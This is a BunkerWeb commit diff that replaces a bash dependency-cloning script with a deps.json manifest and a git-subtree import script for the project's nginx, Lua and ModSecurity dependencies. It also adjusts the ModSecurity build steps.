Merge pull request #547 from bunkerity/subtrees
Migrate regular cloned deps into subtrees
This commit is contained in:
commit
5631e27378
|
@ -1,342 +0,0 @@
|
|||
#!/bin/bash
|
||||
|
||||
function git_update_checker() {
|
||||
repo="$1"
|
||||
commit="$2"
|
||||
main_tmp_folder="/tmp/bunkerweb"
|
||||
mkdir -p "${main_tmp_folder}"
|
||||
echo "ℹ️ Check updates for ${repo}"
|
||||
folder="$(echo "$repo" | sed -E "s@https://github.com/.*/(.*)\.git@\1@")"
|
||||
output="$(git clone --recursive "$repo" "${main_tmp_folder}/${folder}")"
|
||||
if [ $? -ne 0 ] ; then
|
||||
echo "❌ Error cloning $1"
|
||||
echo "$output"
|
||||
rm -rf "${main_tmp_folder}/${folder}" || true
|
||||
return
|
||||
fi
|
||||
old_dir="$(pwd)"
|
||||
cd "${main_tmp_folder}/${folder}"
|
||||
output="$(git checkout "${commit}^{commit}" 2>&1)"
|
||||
if [ $? -ne 0 ] ; then
|
||||
echo "❌ Commit hash $commit is absent from repository $repo"
|
||||
echo "$output"
|
||||
rm -rf "${main_tmp_folder}/${folder}" || true
|
||||
cd "$old_dir"
|
||||
return
|
||||
fi
|
||||
output="$(git fetch 2>&1)"
|
||||
if [ $? -ne 0 ] ; then
|
||||
echo "⚠️ Upgrade version checker error on $repo"
|
||||
echo "$output"
|
||||
rm -rf "${main_tmp_folder}/${folder}" || true
|
||||
cd "$old_dir"
|
||||
return
|
||||
fi
|
||||
latest_tag=$(git describe --tags `git rev-list --tags --max-count=1`)
|
||||
if [ $? -ne 0 ] ; then
|
||||
echo "⚠️ Upgrade version checker error on getting latest tag $repo"
|
||||
echo "$latest_tag"
|
||||
rm -rf "${main_tmp_folder}/${folder}" || true
|
||||
cd "$old_dir"
|
||||
return
|
||||
fi
|
||||
latest_release=$(curl --silent "https://api.github.com/repos/$full_name_repo/releases/latest" | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
|
||||
if [ $? -ne 0 ] ; then
|
||||
echo "⚠️ Upgrade version checker error on getting latest release $repo"
|
||||
echo "$latest_release"
|
||||
rm -fr "${main_tmp_folder}/${folder}" || true
|
||||
cd "$old_dir"
|
||||
return
|
||||
fi
|
||||
current_tag=$(git describe --tags)
|
||||
if [[ ! -z "$latest_tag" ]] && [[ "$current_tag" != *"$latest_tag"* ]]; then
|
||||
echo "⚠️ ️Update checker: new tag found: $latest_tag, current tag/release: $current_tag, please update"
|
||||
fi
|
||||
if [[ ! -z "$latest_release" ]] && [[ "$current_tag" != *"$latest_release"* ]]; then
|
||||
echo "⚠️ ️Update checker: new tag found: $latest_release, current tag/release: $current_tag, please update"
|
||||
fi
|
||||
rm -rf "${main_tmp_folder}/${folder}" || true
|
||||
cd "$old_dir"
|
||||
}
|
||||
|
||||
function git_secure_clone() {
|
||||
repo="$1"
|
||||
commit="$2"
|
||||
folder="$(echo "$repo" | sed -E "s@https://github.com/.*/(.*)\.git@\1@")"
|
||||
if [ ! -d "deps/src/${folder}" ] ; then
|
||||
output="$(git clone --recursive "$repo" "deps/src/${folder}")"
|
||||
if [ $? -ne 0 ] ; then
|
||||
echo "❌ Error cloning $1"
|
||||
echo "$output"
|
||||
exit 1
|
||||
fi
|
||||
old_dir="$(pwd)"
|
||||
cd "deps/src/${folder}"
|
||||
output="$(git checkout "${commit}^{commit}" 2>&1)"
|
||||
if [ $? -ne 0 ] ; then
|
||||
echo "❌ Commit hash $commit is absent from repository $repo"
|
||||
echo "$output"
|
||||
exit 1
|
||||
fi
|
||||
cd "$old_dir"
|
||||
output="$(rm -rf "deps/src/${folder}/.git")"
|
||||
if [ $? -ne 0 ] ; then
|
||||
echo "❌ Can't delete .git from repository $repo"
|
||||
echo "$output"
|
||||
exit 1
|
||||
fi
|
||||
else
|
||||
echo "⚠️ Skipping clone of $repo because target directory is already present"
|
||||
git_update_checker $repo $commit
|
||||
fi
|
||||
}
|
||||
|
||||
function secure_download() {
|
||||
link="$1"
|
||||
file="$2"
|
||||
hash="$3"
|
||||
dir="$(echo $file | sed 's/.tar.gz//g')"
|
||||
if [ ! -d "deps/src/${dir}" ] ; then
|
||||
output="$(wget -q -O "deps/src/${file}" "$link" 2>&1)"
|
||||
if [ $? -ne 0 ] ; then
|
||||
echo "❌ Error downloading $link"
|
||||
echo "$output"
|
||||
exit 1
|
||||
fi
|
||||
check="$(sha512sum "deps/src/${file}" | cut -d ' ' -f 1)"
|
||||
if [ "$check" != "$hash" ] ; then
|
||||
echo "❌️ Wrong hash from file $link (expected $hash got $check)"
|
||||
exit 1
|
||||
fi
|
||||
else
|
||||
echo "⚠️ Skipping download of $link because target directory is already present"
|
||||
fi
|
||||
}
|
||||
|
||||
function do_and_check_cmd() {
|
||||
if [ "$CHANGE_DIR" != "" ] ; then
|
||||
cd "$CHANGE_DIR"
|
||||
fi
|
||||
output=$("$@" 2>&1)
|
||||
ret="$?"
|
||||
if [ $ret -ne 0 ] ; then
|
||||
echo "❌ Error from command : $*"
|
||||
echo "$output"
|
||||
exit $ret
|
||||
fi
|
||||
#echo $output
|
||||
return 0
|
||||
}
|
||||
|
||||
# nginx 1.24.0
|
||||
echo "ℹ️ Downloading nginx"
|
||||
NGINX_VERSION="1.24.0"
|
||||
secure_download "https://nginx.org/download/nginx-${NGINX_VERSION}.tar.gz" "nginx-${NGINX_VERSION}.tar.gz" "1114e37de5664a8109c99cfb2faa1f42ff8ac63c932bcf3780d645e5ed32c0b2ac446f80305b4465994c8f9430604968e176ae464fd80f632d1cb2c8f6007ff3"
|
||||
if [ -f "deps/src/nginx-${NGINX_VERSION}.tar.gz" ] ; then
|
||||
do_and_check_cmd tar -xvzf deps/src/nginx-${NGINX_VERSION}.tar.gz -C deps/src
|
||||
do_and_check_cmd rm -f deps/src/nginx-${NGINX_VERSION}.tar.gz
|
||||
fi
|
||||
|
||||
# Lua 5.1.5
|
||||
echo "ℹ️ Downloading Lua"
|
||||
LUA_VERSION="5.1.5"
|
||||
secure_download "https://www.lua.org/ftp/lua-${LUA_VERSION}.tar.gz" "lua-${LUA_VERSION}.tar.gz" "0142fefcbd13afcd9b201403592aa60620011cc8e8559d4d2db2f92739d18186860989f48caa45830ff4f99bfc7483287fd3ff3a16d4dec928e2767ce4d542a9"
|
||||
if [ -f "deps/src/lua-${LUA_VERSION}.tar.gz" ] ; then
|
||||
do_and_check_cmd tar -xvzf deps/src/lua-${LUA_VERSION}.tar.gz -C deps/src
|
||||
do_and_check_cmd rm -f deps/src/lua-${LUA_VERSION}.tar.gz
|
||||
do_and_check_cmd patch deps/src/lua-${LUA_VERSION}/Makefile deps/misc/lua.patch1
|
||||
do_and_check_cmd patch deps/src/lua-${LUA_VERSION}/src/Makefile deps/misc/lua.patch2
|
||||
fi
|
||||
|
||||
# LuaJIT v2.1-20230410
|
||||
echo "ℹ️ Downloading LuaJIT"
|
||||
git_secure_clone "https://github.com/openresty/luajit2.git" "04f33ff01da97905a1641985fb5c840d234f97f1"
|
||||
|
||||
# lua-nginx-module v0.10.25
|
||||
echo "ℹ️ Downloading lua-nginx-module"
|
||||
git_secure_clone "https://github.com/openresty/lua-nginx-module.git" "c47084b5d719ce507d2419d8660f39544a9d1fea"
|
||||
|
||||
# lua-resty-core v0.1.27
|
||||
echo "ℹ️ Downloading lua-resty-core"
|
||||
git_secure_clone "https://github.com/openresty/lua-resty-core.git" "31fae862a1ed64033591f991fadb0dd80358ba0b"
|
||||
|
||||
# lua-resty-lrucache v0.13
|
||||
echo "ℹ️ Downloading lua-resty-lrucache"
|
||||
git_secure_clone "https://github.com/openresty/lua-resty-lrucache.git" "a79615ec9dc547fdb4aaee59ef8f5a50648ce9fd"
|
||||
|
||||
# lua-resty-dns v0.22
|
||||
echo "ℹ️ Downloading lua-resty-dns"
|
||||
git_secure_clone "https://github.com/openresty/lua-resty-dns.git" "869d2fbb009b6ada93a5a10cb93acd1cc12bd53f"
|
||||
|
||||
# lua-resty-session v4.0.4
|
||||
echo "ℹ️ Downloading lua-resty-session"
|
||||
git_secure_clone "https://github.com/bungle/lua-resty-session.git" "8b5f8752f3046396c414c5b97850e784c07e1641"
|
||||
|
||||
# lua-resty-random v?
|
||||
echo "ℹ️ Downloading lua-resty-random"
|
||||
git_secure_clone "https://github.com/bungle/lua-resty-random.git" "17b604f7f7dd217557ca548fc1a9a0d373386480"
|
||||
|
||||
# lua-resty-string v0.15
|
||||
echo "ℹ️ Downloading lua-resty-string"
|
||||
git_secure_clone "https://github.com/openresty/lua-resty-string.git" "b192878f6ed31b0af237935bbc5a8110a3c2256c"
|
||||
|
||||
# lua-cjson v2.1.0.12
|
||||
echo "ℹ️ Downloading lua-cjson"
|
||||
git_secure_clone "https://github.com/openresty/lua-cjson.git" "881accc8fadca5ec02aa34d364df2a1aa25cd2f9"
|
||||
|
||||
# lua-gd v2.0.33r3+
|
||||
echo "ℹ️ Downloading lua-gd"
|
||||
git_secure_clone "https://github.com/ittner/lua-gd.git" "2ce8e478a8591afd71e607506bc8c64b161bbd30"
|
||||
|
||||
# lua-resty-http v0.17.1
|
||||
echo "ℹ️ Downloading lua-resty-http"
|
||||
git_secure_clone "https://github.com/ledgetech/lua-resty-http.git" "4ab4269cf442ba52507aa2c718f606054452fcad"
|
||||
|
||||
# lualogging v1.8.2
|
||||
echo "ℹ️ Downloading lualogging"
|
||||
git_secure_clone "https://github.com/lunarmodules/lualogging.git" "465c994788f1bc18fca950934fa5ec9a909f496c"
|
||||
|
||||
# luasocket v3.1.0
|
||||
echo "ℹ️ Downloading luasocket"
|
||||
git_secure_clone "https://github.com/diegonehab/luasocket.git" "95b7efa9da506ef968c1347edf3fc56370f0deed"
|
||||
|
||||
# luasec v1.3.1
|
||||
echo "ℹ️ Downloading luasec"
|
||||
git_secure_clone "https://github.com/brunoos/luasec.git" "fddde111f7fe9ad5417d75ebbd70429d13eaad97"
|
||||
|
||||
# lua-resty-ipmatcher v0.6.1 (3 commits after just in case)
|
||||
echo "ℹ️ Downloading lua-resty-ipmatcher"
|
||||
dopatch="no"
|
||||
if [ ! -d "deps/src/lua-resty-ipmatcher" ] ; then
|
||||
dopatch="yes"
|
||||
fi
|
||||
git_secure_clone "https://github.com/api7/lua-resty-ipmatcher.git" "7fbb618f7221b1af1451027d3c64e51f3182761c"
|
||||
if [ "$dopatch" = "yes" ] ; then
|
||||
do_and_check_cmd patch deps/src/lua-resty-ipmatcher/resty/ipmatcher.lua deps/misc/ipmatcher.patch
|
||||
fi
|
||||
|
||||
# lua-resty-redis v0.30
|
||||
echo "ℹ️ Downloading lua-resty-redis"
|
||||
git_secure_clone "https://github.com/openresty/lua-resty-redis.git" "d7c25f1b339d79196ff67f061c547a73a920b580"
|
||||
|
||||
# lua-resty-upload v0.11
|
||||
echo "ℹ️ Downloading lua-resty-upload"
|
||||
git_secure_clone "https://github.com/openresty/lua-resty-upload.git" "03704aee42f7135e7782688d8a9af63a16015edc"
|
||||
|
||||
# luajit-geoip v2.1.0
|
||||
echo "ℹ️ Downloading luajit-geoip"
|
||||
dopatch="no"
|
||||
if [ ! -d "deps/src/luajit-geoip" ] ; then
|
||||
dopatch="yes"
|
||||
fi
|
||||
git_secure_clone "https://github.com/leafo/luajit-geoip.git" "12a9388207f40c37ad5cf6de2f8e0cc72bf13477"
|
||||
if [ "$dopatch" = "yes" ] ; then
|
||||
do_and_check_cmd patch deps/src/luajit-geoip/geoip/mmdb.lua deps/misc/mmdb.patch
|
||||
fi
|
||||
|
||||
# lbase64 v1.5.3
|
||||
echo "ℹ️ Downloading lbase64"
|
||||
git_secure_clone "https://github.com/iskolbin/lbase64.git" "c261320edbdf82c16409d893a96c28c704aa0ab8"
|
||||
|
||||
# lua-resty-env v0.4.0
|
||||
echo "ℹ️ Downloading lua-resty-env"
|
||||
git_secure_clone "https://github.com/3scale/lua-resty-env.git" "adb294def823dd910ffa11972d2c61eab7cfce3e"
|
||||
|
||||
# lua-resty-mlcache v2.6.0
|
||||
echo "ℹ️ Downloading lua-resty-mlcache"
|
||||
git_secure_clone "https://github.com/thibaultcha/lua-resty-mlcache.git" "f140f56663cbdb9cdd247d29f75c299c702ff6b4"
|
||||
|
||||
# lua-resty-template v2.0
|
||||
echo "ℹ️ Downloading lua-resty-template"
|
||||
git_secure_clone "https://github.com/bungle/lua-resty-template.git" "c08c6bc9e27710806990f2dec0f03b19406976ac"
|
||||
|
||||
# lua-resty-lock v0.09
|
||||
echo "ℹ️ Downloading lua-resty-lock"
|
||||
git_secure_clone "https://github.com/openresty/lua-resty-lock.git" "9dc550e56b6f3b1a2f1a31bb270a91813b5b6861"
|
||||
|
||||
# lua-resty-openssl v0.8.23
|
||||
echo "ℹ️ Downloading lua-resty-openssl"
|
||||
dopatch="no"
|
||||
if [ ! -d "deps/src/lua-resty-openssl" ] ; then
|
||||
dopatch="yes"
|
||||
fi
|
||||
git_secure_clone "https://github.com/fffonion/lua-resty-openssl.git" "b23c072a405b749ac60d21e3946cbf57a959b780"
|
||||
if [ "$dopatch" == "yes" ] ; then
|
||||
do_and_check_cmd rm -r deps/src/lua-resty-openssl/t
|
||||
fi
|
||||
|
||||
# lua-ffi-zlib v0.5.0
|
||||
echo "ℹ️ Downloading lua-ffi-zlib"
|
||||
dopatch="no"
|
||||
if [ ! -d "deps/src/lua-ffi-zlib" ] ; then
|
||||
dopatch="yes"
|
||||
fi
|
||||
git_secure_clone "https://github.com/hamishforbes/lua-ffi-zlib.git" "1fb69ca505444097c82d2b72e87904f3ed923ae9"
|
||||
if [ "$dopatch" = "yes" ] ; then
|
||||
do_and_check_cmd patch deps/src/lua-ffi-zlib/lib/ffi-zlib.lua deps/misc/lua-ffi-zlib.patch
|
||||
fi
|
||||
|
||||
# lua-resty-signal v0.03
|
||||
echo "ℹ️ Downloading lua-resty-signal"
|
||||
git_secure_clone "https://github.com/openresty/lua-resty-signal.git" "d07163e8cfa673900e66048cd2a1f18523aecf16"
|
||||
|
||||
# ModSecurity v3.0.9
|
||||
echo "ℹ️ Downloading ModSecurity"
|
||||
dopatch="no"
|
||||
if [ ! -d "deps/src/ModSecurity" ] ; then
|
||||
dopatch="yes"
|
||||
fi
|
||||
git_secure_clone "https://github.com/SpiderLabs/ModSecurity.git" "205dac0e8c675182f96b5c2fb06be7d1cf7af2b2"
|
||||
if [ "$dopatch" = "yes" ] ; then
|
||||
do_and_check_cmd patch deps/src/ModSecurity/configure.ac deps/misc/modsecurity.patch
|
||||
do_and_check_cmd rm -rf deps/src/ModSecurity/others/libinjection
|
||||
fi
|
||||
|
||||
# libinjection v3.10.0+
|
||||
# TODO: check if the latest commit is fine
|
||||
echo "ℹ️ Downloading libinjection"
|
||||
git_secure_clone "https://github.com/libinjection/libinjection.git" "49904c42a6e68dc8f16c022c693e897e4010a06c"
|
||||
do_and_check_cmd cp -r deps/src/libinjection deps/src/ModSecurity/others
|
||||
|
||||
# ModSecurity-nginx v1.0.3
|
||||
echo "ℹ️ Downloading ModSecurity-nginx"
|
||||
dopatch="no"
|
||||
if [ ! -d "deps/src/ModSecurity-nginx" ] ; then
|
||||
dopatch="yes"
|
||||
fi
|
||||
git_secure_clone "https://github.com/SpiderLabs/ModSecurity-nginx.git" "d59e4ad121df702751940fd66bcc0b3ecb51a079"
|
||||
if [ "$dopatch" = "yes" ] ; then
|
||||
do_and_check_cmd patch deps/src/ModSecurity-nginx/src/ngx_http_modsecurity_log.c deps/misc/modsecurity-nginx.patch
|
||||
do_and_check_cmd patch deps/src/ModSecurity-nginx/config deps/misc/config.patch
|
||||
do_and_check_cmd patch deps/src/ModSecurity-nginx/src/ngx_http_modsecurity_common.h deps/misc/ngx_http_modsecurity_common.h.patch
|
||||
do_and_check_cmd patch deps/src/ModSecurity-nginx/src/ngx_http_modsecurity_module.c deps/misc/ngx_http_modsecurity_module.c.patch
|
||||
do_and_check_cmd cp deps/misc/ngx_http_modsecurity_access.c deps/src/ModSecurity-nginx/src
|
||||
fi
|
||||
|
||||
# libmaxminddb v1.7.1
|
||||
echo "ℹ️ Downloading libmaxminddb"
|
||||
git_secure_clone "https://github.com/maxmind/libmaxminddb.git" "ac4d0d2480032a8664e251588e57d7b306ca630c"
|
||||
|
||||
# zlib v1.2.13
|
||||
echo "ℹ️ Downloading zlib"
|
||||
git_secure_clone "https://github.com/madler/zlib.git" "04f42ceca40f73e2978b50e93806c2a18c1281fc"
|
||||
|
||||
# headers-more-nginx-module v0.34
|
||||
echo "ℹ️ Downloading headers-more-nginx-module"
|
||||
git_secure_clone "https://github.com/openresty/headers-more-nginx-module.git" "bea1be3bbf6af28f6aa8cf0c01c07ee1637e2bd0"
|
||||
|
||||
# nginx_cookie_flag_module v1.1.0
|
||||
echo "ℹ️ Downloading nginx_cookie_flag_module"
|
||||
git_secure_clone "https://github.com/AirisX/nginx_cookie_flag_module.git" "4e48acf132952bbed43b28a8e6af0584dacb7b4c"
|
||||
|
||||
# ngx_brotli v1.0.0
|
||||
echo "ℹ️ Downloading ngx_brotli"
|
||||
git_secure_clone "https://github.com/google/ngx_brotli.git" "6e975bcb015f62e1f303054897783355e2a877dc"
|
||||
|
||||
# ngx_devel_kit v0.3.2
|
||||
echo "ℹ️ Downloading ngx_devel_kit"
|
||||
git_secure_clone "https://github.com/vision5/ngx_devel_kit.git" "b4642d6ca01011bd8cd30b253f5c3872b384fd21"
|
||||
|
||||
# stream-lua-nginx-module v0.0.13
|
||||
echo "ℹ️ Downloading stream-lua-nginx-module"
|
||||
git_secure_clone "https://github.com/openresty/stream-lua-nginx-module.git" "309198abf26266f1a3e53c71388ed7bb9d1e5ea2"
|
|
@ -0,0 +1,233 @@
|
|||
{
|
||||
"download": [
|
||||
{
|
||||
"name": "Lua",
|
||||
"url": "https://www.lua.org/ftp/lua-5.1.5.tar.gz",
|
||||
"sha512": "0142fefcbd13afcd9b201403592aa60620011cc8e8559d4d2db2f92739d18186860989f48caa45830ff4f99bfc7483287fd3ff3a16d4dec928e2767ce4d542a9"
|
||||
}
|
||||
],
|
||||
"git_repository": [
|
||||
{
|
||||
"id": "luajit",
|
||||
"name": "LuaJIT",
|
||||
"url": "https://github.com/openresty/luajit2.git",
|
||||
"commit": "v2.1-20230410"
|
||||
},
|
||||
{
|
||||
"id": "modsecurity",
|
||||
"name": "ModSecurity",
|
||||
"url": "https://github.com/SpiderLabs/ModSecurity.git",
|
||||
"commit": "v3.0.9"
|
||||
},
|
||||
{
|
||||
"id": "modsecurity-nginx",
|
||||
"name": "ModSecurity-nginx",
|
||||
"url": "https://github.com/SpiderLabs/ModSecurity-nginx.git",
|
||||
"commit": "v1.0.3"
|
||||
},
|
||||
{
|
||||
"id": "nginx",
|
||||
"name": "Nginx",
|
||||
"url": "https://github.com/nginx/nginx.git",
|
||||
"commit": "release-1.24.0"
|
||||
},
|
||||
{
|
||||
"id": "ngx_brotli",
|
||||
"name": "Nginx Brotli v1.0.9",
|
||||
"url": "https://github.com/google/ngx_brotli.git",
|
||||
"commit": "6e975bcb015f62e1f303054897783355e2a877dc"
|
||||
},
|
||||
{
|
||||
"id": "nginx_cookie_flag_module",
|
||||
"name": "Nginx cookie flag module",
|
||||
"url": "https://github.com/AirisX/nginx_cookie_flag_module.git",
|
||||
"commit": "v1.1.0"
|
||||
},
|
||||
{
|
||||
"id": "ngx_devel_kit",
|
||||
"name": "Nginx devel kit",
|
||||
"url": "https://github.com/vision5/ngx_devel_kit.git",
|
||||
"commit": "v0.3.2"
|
||||
},
|
||||
{
|
||||
"id": "headers-more-nginx-module",
|
||||
"name": "headers-more-nginx-module",
|
||||
"url": "https://github.com/openresty/headers-more-nginx-module.git",
|
||||
"commit": "v0.34"
|
||||
},
|
||||
{
|
||||
"id": "lbase64",
|
||||
"name": "lbase64",
|
||||
"url": "https://github.com/iskolbin/lbase64.git",
|
||||
"commit": "v1.5.3"
|
||||
},
|
||||
{
|
||||
"id": "libinjection",
|
||||
"name": "libinjection v3.10.0+",
|
||||
"url": "https://github.com/libinjection/libinjection.git",
|
||||
"commit": "49904c42a6e68dc8f16c022c693e897e4010a06c"
|
||||
},
|
||||
{
|
||||
"id": "libmaxminddb",
|
||||
"name": "libmaxminddb",
|
||||
"url": "https://github.com/maxmind/libmaxminddb.git",
|
||||
"commit": "1.7.1"
|
||||
},
|
||||
{
|
||||
"id": "lua-cjson",
|
||||
"name": "lua-cjson",
|
||||
"url": "https://github.com/openresty/lua-cjson.git",
|
||||
"commit": "2.1.0.12"
|
||||
},
|
||||
{
|
||||
"id": "lua-ffi-zlib",
|
||||
"name": "lua-ffi-zlib",
|
||||
"url": "https://github.com/hamishforbes/lua-ffi-zlib.git",
|
||||
"commit": "v0.5"
|
||||
},
|
||||
{
|
||||
"id": "lua-gd",
|
||||
"name": "lua-gd v2.0.33r3+",
|
||||
"url": "https://github.com/ittner/lua-gd.git",
|
||||
"commit": "2ce8e478a8591afd71e607506bc8c64b161bbd30"
|
||||
},
|
||||
{
|
||||
"id": "lua-nginx-module",
|
||||
"name": "lua-nginx-module",
|
||||
"url": "https://github.com/openresty/lua-nginx-module.git",
|
||||
"commit": "v0.10.25"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-core",
|
||||
"name": "lua-resty-core",
|
||||
"url": "https://github.com/openresty/lua-resty-core.git",
|
||||
"commit": "v0.1.27"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-dns",
|
||||
"name": "lua-resty-dns",
|
||||
"url": "https://github.com/openresty/lua-resty-dns.git",
|
||||
"commit": "v0.22"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-env",
|
||||
"name": "lua-resty-env",
|
||||
"url": "https://github.com/3scale/lua-resty-env.git",
|
||||
"commit": "v0.4.0"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-http",
|
||||
"name": "lua-resty-http",
|
||||
"url": "https://github.com/ledgetech/lua-resty-http.git",
|
||||
"commit": "v0.17.1"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-ipmatcher",
|
||||
"name": "lua-resty-ipmatcher v0.6.1 (3 commits after just in case)",
|
||||
"url": "https://github.com/api7/lua-resty-ipmatcher.git",
|
||||
"commit": "7fbb618f7221b1af1451027d3c64e51f3182761c"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-lock",
|
||||
"name": "lua-resty-lock",
|
||||
"url": "https://github.com/openresty/lua-resty-lock.git",
|
||||
"commit": "v0.09"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-lrucache",
|
||||
"name": "lua-resty-lrucache",
|
||||
"url": "https://github.com/openresty/lua-resty-lrucache.git",
|
||||
"commit": "v0.13"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-mlcache",
|
||||
"name": "lua-resty-mlcache",
|
||||
"url": "https://github.com/thibaultcha/lua-resty-mlcache.git",
|
||||
"commit": "2.6.0"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-openssl",
|
||||
"name": "lua-resty-openssl",
|
||||
"url": "https://github.com/fffonion/lua-resty-openssl.git",
|
||||
"commit": "0.8.23"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-random",
|
||||
"name": "lua-resty-random (latest commit)",
|
||||
"url": "https://github.com/bungle/lua-resty-random.git",
|
||||
"commit": "17b604f7f7dd217557ca548fc1a9a0d373386480"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-redis",
|
||||
"name": "lua-resty-redis",
|
||||
"url": "https://github.com/openresty/lua-resty-redis.git",
|
||||
"commit": "v0.30"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-session",
|
||||
"name": "lua-resty-session",
|
||||
"url": "https://github.com/bungle/lua-resty-session.git",
|
||||
"commit": "v4.0.4"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-signal",
|
||||
"name": "lua-resty-signal",
|
||||
"url": "https://github.com/openresty/lua-resty-signal.git",
|
||||
"commit": "v0.03"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-string",
|
||||
"name": "lua-resty-string",
|
||||
"url": "https://github.com/openresty/lua-resty-string.git",
|
||||
"commit": "v0.15"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-template",
|
||||
"name": "lua-resty-template",
|
||||
"url": "https://github.com/bungle/lua-resty-template.git",
|
||||
"commit": "v2.0"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-upload",
|
||||
"name": "lua-resty-upload",
|
||||
"url": "https://github.com/openresty/lua-resty-upload.git",
|
||||
"commit": "v0.11"
|
||||
},
|
||||
{
|
||||
"id": "luajit-geoip",
|
||||
"name": "luajit-geoip",
|
||||
"url": "https://github.com/leafo/luajit-geoip.git",
|
||||
"commit": "v2.1.0"
|
||||
},
|
||||
{
|
||||
"id": "lualogging",
|
||||
"name": "lualogging",
|
||||
"url": "https://github.com/lunarmodules/lualogging.git",
|
||||
"commit": "v1.8.2"
|
||||
},
|
||||
{
|
||||
"id": "luasec",
|
||||
"name": "luasec",
|
||||
"url": "https://github.com/brunoos/luasec.git",
|
||||
"commit": "v1.3.1"
|
||||
},
|
||||
{
|
||||
"id": "luasocket",
|
||||
"name": "luasocket",
|
||||
"url": "https://github.com/diegonehab/luasocket.git",
|
||||
"commit": "v3.1.0"
|
||||
},
|
||||
{
|
||||
"id": "stream-lua-nginx-module",
|
||||
"name": "stream-lua-nginx-module",
|
||||
"url": "https://github.com/openresty/stream-lua-nginx-module.git",
|
||||
"commit": "v0.0.13"
|
||||
},
|
||||
{
|
||||
"id": "zlib",
|
||||
"name": "zlib",
|
||||
"url": "https://github.com/madler/zlib.git",
|
||||
"commit": "v1.2.13"
|
||||
}
|
||||
]
|
||||
}
|
|
@ -0,0 +1,59 @@
|
|||
#!/bin/bash
|
||||
|
||||
function do_and_check_cmd() {
|
||||
output=$("$@" 2>&1)
|
||||
ret="$?"
|
||||
if [ $ret -ne 0 ] ; then
|
||||
echo "❌ Error from command : $*"
|
||||
echo "$output"
|
||||
exit $ret
|
||||
fi
|
||||
return 0
|
||||
}
|
||||
|
||||
jq -c .download[] src/deps/deps.json | while read download
|
||||
do
|
||||
url="$(echo $download | jq -r .url)"
|
||||
id="$(echo $url | sed 's/.*\/\([^\/]*\)\.tar\.gz/\1/')"
|
||||
name="$(echo $download | jq -r .name)"
|
||||
sha512="$(echo $download | jq -r .sha512)"
|
||||
|
||||
echo "ℹ️ Downloading ${name} from ${url}"
|
||||
|
||||
if [ ! -d "src/deps/src/${id}" ] ; then
|
||||
do_and_check_cmd wget -q -O "src/deps/src/${id}.tar.gz" "$url"
|
||||
check="$(sha512sum "src/deps/src/${id}.tar.gz" | cut -d ' ' -f 1)"
|
||||
if [ "$check" != "$sha512" ] ; then
|
||||
echo "❌️ Wrong hash from file $url (expected $sha512 got $check)"
|
||||
exit 1
|
||||
fi
|
||||
if [ -f "src/deps/src/${id}.tar.gz" ] ; then
|
||||
do_and_check_cmd tar -xvzf src/deps/src/${id}.tar.gz -C src/deps/src
|
||||
do_and_check_cmd rm -f src/deps/src/${id}.tar.gz
|
||||
fi
|
||||
else
|
||||
echo "⚠️ Skipping download of $url because target directory is already present"
|
||||
fi
|
||||
done
|
||||
|
||||
jq -c .git_repository[] src/deps/deps.json | while read repo
|
||||
do
|
||||
id="$(echo $repo | jq -r .id)"
|
||||
name="$(echo $repo | jq -r .name)"
|
||||
url="$(echo $repo | jq -r .url)"
|
||||
commit="$(echo $repo | jq -r .commit)"
|
||||
|
||||
echo "ℹ️ Clone ${name} from ${url} at commit/version ${commit}"
|
||||
|
||||
if [ ! -d "src/deps/src/${id}" ] ; then
|
||||
do_and_check_cmd git subtree add --prefix src/deps/src/${id} ${url} ${commit} --squash
|
||||
else
|
||||
echo "⚠️ Skipping clone of $url because target directory is already present"
|
||||
echo "ℹ️ Updating ${name} from ${url} at commit/version ${commit}"
|
||||
do_and_check_cmd git subtree pull --prefix src/deps/src/${id} ${url} ${commit} --squash
|
||||
fi
|
||||
|
||||
if [ -d "src/deps/src/${id}/.git" ] ; then
|
||||
do_and_check_cmd rm -rf "src/deps/src/${id}/.git"
|
||||
fi
|
||||
done
|
|
@ -41,16 +41,19 @@ CHANGE_DIR="/tmp/bunkerweb/deps/src/zlib" do_and_check_cmd make install
|
|||
echo "ℹ️ Compiling and installing ModSecurity"
|
||||
# temp fix : Debian run it twice
|
||||
# TODO : patch it in clone.sh
|
||||
cd /tmp/bunkerweb/deps/src/ModSecurity && ./build.sh > /dev/null 2>&1
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/ModSecurity" do_and_check_cmd sh build.sh
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/ModSecurity" do_and_check_cmd ./configure --disable-dependency-tracking --disable-static --disable-examples --disable-doxygen-doc --disable-doxygen-html --disable-valgrind-memcheck --disable-valgrind-helgrind --prefix=/usr/share/bunkerweb/deps --with-maxmind=/usr/share/bunkerweb/deps
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/ModSecurity" do_and_check_cmd make -j $NTASK
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/ModSecurity" do_and_check_cmd make install-strip
|
||||
do_and_check_cmd patch /tmp/bunkerweb/deps/src/modsecurity/configure.ac /tmp/bunkerweb/deps/misc/modsecurity.patch
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/modsecurity" do_and_check_cmd rm -rf others/libinjection
|
||||
do_and_check_cmd cp -r /tmp/bunkerweb/deps/src/libinjection /tmp/bunkerweb/deps/src/modsecurity/others/libinjection
|
||||
cd /tmp/bunkerweb/deps/src/modsecurity && ./build.sh > /dev/null 2>&1
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/modsecurity" do_and_check_cmd sh build.sh
|
||||
